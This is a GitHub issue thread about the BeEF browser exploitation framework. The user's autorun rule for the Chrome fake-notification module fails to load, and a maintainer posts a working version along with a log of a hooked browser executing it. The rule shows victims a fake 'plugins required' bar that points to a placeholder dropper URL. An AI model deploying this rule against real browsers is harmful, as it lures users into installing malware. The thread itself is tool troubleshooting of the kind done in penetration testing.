### ISSUE TITLE
The specified option (notification_text) for module (fake_notification_c) does not exist

### ISSUE THREAD

**Issue by jregele** [beefproject/beef#1475]
#### Environment

What version/revision of BeEF are you using?
beef-0.4.7.0-alpha

On what version of Ruby?
2.3.0

On what browser?
Any

On what operating system?

#### Configuration

This is a fresh install as of 2 days ago. No special changes to the configuration, other the Port hosting BeEF

#### Summary

Ran into the same is as [https://github.com/beefproject/beef/issues/1227] and even after following the instructions to set all the parameters found in fake_notification_c/modules.rb, I'm still getting the error

`[ARE] Ruleset (Chrome Fake Notification): ERROR. The specified option (notification_text) for module (fake_notification_c) does not exist`

I have set both the options mentioned in modules.rb, so not sure if its the same problem as the link posted above. Here is my rules file

{
  "name": "Chrome Fake Notification",
  "author": "jregele",
  "browser": "C",
  "browser_version": "ALL",
  "os": "ALL",
  "os_version": "ALL",
  "modules": [
    {
      "name": "fake_notification_c",
      "condition": null,
      "options": {
        "notification_text":"Additional plugins are required to display all the media on this page.",
        "url":"http://mydropper.url"
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [1000],
  "chain_mode": "sequential"
}

#### Expected Behaviour

Expected the rule to load

#### Actual Behaviour

`[ARE] Ruleset (Chrome Fake Notification): ERROR. The specified option (notification_text) for module (fake_notification_c) does not exist`

#### Steps to Reproduce

See ARE rule above

#### Additional Information

Please provide any additional information which may be useful in resolving this issue, such as debugging output and relevant screen shots.

**Comment by bcoles** [comment]
Make sure you specify the options as the same order in which they appear in `module.rb`

**Comment by jregele** [comment]
I switched them to match the module.rb file (url first, then notification_text), but still no dice.

**Comment by bcoles** [comment]
Does BeEF successfully detect the browser as Chrome?

Did you place the rule in the `enabled` directory? `arerules/enabled/asdf.json`

Is it just this one rule you're having issues with, or all ARE rules?

Do you have NodeJS installed?

Works fine for me.

```json
{
"name": "Chrome Fake Notification",
"author": "jregele",
"browser": "C",
"browser_version": "ALL",
"os": "ALL",
"os_version": "ALL",
"modules": [
{
"name": "fake_notification_c",
"condition": null,
"options": {
"url":"http://mydropper.url",
"notification_text":"Additional plugins are required to display all the media on this page."
}
}
],
"execution_order": [0],
"execution_delay": [1000],
"chain_mode": "sequential"
}
```

```
[20:18:20][*] New Hooked Browser [id:1, ip:10.1.1.123, browser:C-49, os:Windows-XP], hooked domain [10.1.1.200:3000]
[20:18:20][*] [ARE] Checking if any defined rules should be triggered on target.
[20:18:20]    |_  Browser version check -> (hook) 49 ALL (rule) : true
[20:18:20]    |_  OS version check -> (hook) XP ALL (rule): true
[20:18:20]    |_  Hooked browser and OS type/version MATCH rule: Chrome Fake Notification.
[20:18:20]    |_  Found [1/2] ARE rules matching the hooked browser type/version.
[20:18:20]    |_  Preparing JS for command id [1], module [fake_notification_c]
[20:18:20]    |_  Triggering ruleset [2] on HB 1
[20:18:23][*] Hooked browser [id:1, ip:10.1.1.123] has executed instructions (status: SUCCESS) from command module [cid:1, mod: 172, name:'Fake Notification Bar (Chrome)']
```
